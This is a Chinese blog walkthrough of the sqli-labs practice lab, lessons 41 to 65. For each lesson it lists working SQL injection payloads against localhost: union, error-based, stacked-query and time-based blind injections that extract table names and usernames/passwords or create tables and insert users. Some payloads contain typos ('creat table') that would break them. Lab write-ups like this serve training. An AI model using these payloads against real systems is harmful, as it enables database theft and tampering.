美文网首页sql注入
sqli-labs (41-65)

sqli-labs (41-65)

作者: lokisteven | 来源:发表于2019-02-26 18:50 被阅读36次

    less-41

    只有输入id=1才会出现回显,尝试输入 ?id=0 union select 1,1,1 成功回显

    爆库:

    id=0 union select 1,1,database()
    

    爆表:

    id=0 union select 1,1,group_concat(table_name) from information_schema.tables where table_schema='security'
    

    爆列:

    id=0 union select 1,1,group_concat(column_name) from information_schema.columns where table_name='users'
    

    爆值:

    id=0 union select 1,1,group_concat(username,password) from users
    

    less-42

    查看源码:


    图片.png

    Password变量在post过程中,没有通过mysql_real_escape_string()函数的处理。
    用户名可以随意填写,
    密码我们可以构造进行注入。

    通过伪造表查看数据列名

    在密码栏填写:

    a';creat table less42 like users#
    

    创建成功后发现,users表中数据列名为id,username,password
    以此类推,只需插入数据(或者更新数据)即可

    a';insert into users (username,password) values ('a','a')#
    
    图片.png

    less-43

    先用同样的方法测试,就用less42的方法,
    注入语句:a';creat table less43 like users#


    图片.png

    发现报错
    根据报错提示,只需在less-42的基础上加一个括号,即:

    a');creat table less43 like users#
    

    以此类推,同less-42

    less-44

    同less-42,只不过没有报错回显,我们只能通过查看数据库来判断是否注入成功
    通过测试,发现和less42一样。

    less-45

    集结了less-44和less-43,即报错不回显,测试方法同less-44,盲注,观察数据库,注入方法和less-43一样。

    less-46

    借鉴于博客
    尝试?sort=1 desc或者asc,显示结果不同,则表明可以注入。
    爆表:

    http://localhost/sqli-labs/Less-46/index.php?sort=extractvalue(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())))%20--+
    
    图片.png

    爆列:

    http://localhost/sqli-labs/Less-46/index.php?sort=extractvalue(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)))--+
    
    图片.png

    爆值:

    localhost/sqli-labs/Less-46/index.php?sort=extractvalue(1,concat(0x7e,(select group_concat(username,password) from users)))--+
    
    图片.png

    less-47
    输入?sort=1,回显正常,输入?sort=1',报错


    图片.png

    根据报错提示,显示为单引号,故
    爆表:

    http://localhost/sqli-labs/Less-47/?sort=1%27%20and%20extractvalue(1,concat(0x7,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())))--+
    

    以此类推。
    less-48
    http://localhost/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=178)
    http://localhost/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=115)

    图片.png
    less-49
    延时注入:
    http://localhost/sqli-labs/Less-49/index.php?sort=1%27%20and%20(If(ascii(substr((select%20username%20from%20users%20where%20id=1),1,1))=115,0,sleep(5)))--+
    或者如less-48
    less-50
    http://localhost/sqli-labs/Less-50/?sort=1;create%20table%20less50%20like%20users
    less-51
    http://localhost/sqli-labs/Less-51/?sort=1%27;create%20table%20less51%20like%20users--+
    less-52
    http://localhost/sqli-labs/Less-52/?sort=1;create%20table%20less52%20like%20users--+
    less-53
    ?sort=1%27;create%20table%20less53%20like%20users–+
    less-54
    爆表:
    http://localhost/sqli-labs/Less-54/index.php?id=0%27%20union%20select%201,1,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27--+
    爆列:
    http://localhost/sqli-labs/Less-54/index.php?id=0%27%20union%20select%201,1,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27gxdghjy72p%27--+
    爆值:
    http://localhost/sqli-labs/Less-54/index.php?id=0%27%20union%20select%201,1,group_concat(secret_X79M)%20from%20gxdghjy72p--+
    less-55
    多一个括号?id=0) 次数为14次
    less-56
    思路同上54 ,只不过多一个括号?id=0') 次数为14次
    less-57
    思路同上,只不过 id=”.$id.” 这里进行了双引号闭合
    ?id=-1”union select 1,1,group_concat(table_name) from information_schema.tables where table_schema=’challenges’%23
    less-58
    尝试了查询database() 不返回数据。
    那就只能试试报错注入了
    ?id=0’union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’challenges’),0x7e))--+
    less-59
    同上,只不过没有单引号
    ?id=0 union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’challenges’),0x7e))--+
    less-60
    同上,只不过多了双引号和括号?id=0”)
    ?id=0”) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’challenges’),0x7e))--+

    less-61
    同上,只不过多了两个括号和一个双引号?id=0’))
    ?id=0’)) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=’challenges’),0x7e))--+

    less-62
    union和报错注入失效
    使用延时注入
    ?id=1')and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(10))--+

    less-63
    同上62,只不过是单引号
    ?id=0%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--++
    正确时间短,错误时间长

    less-64
    同上63,只不过是双括号
    ?id=0))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
    正确时间短,错误时间长

    less-65
    同上,只不过?id=1”)
    ?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))--+

    相关文章

      网友评论

        本文标题:sqli-labs (41-65)

        本文链接:https://www.haomeiwen.com/subject/fqlfeqtx.html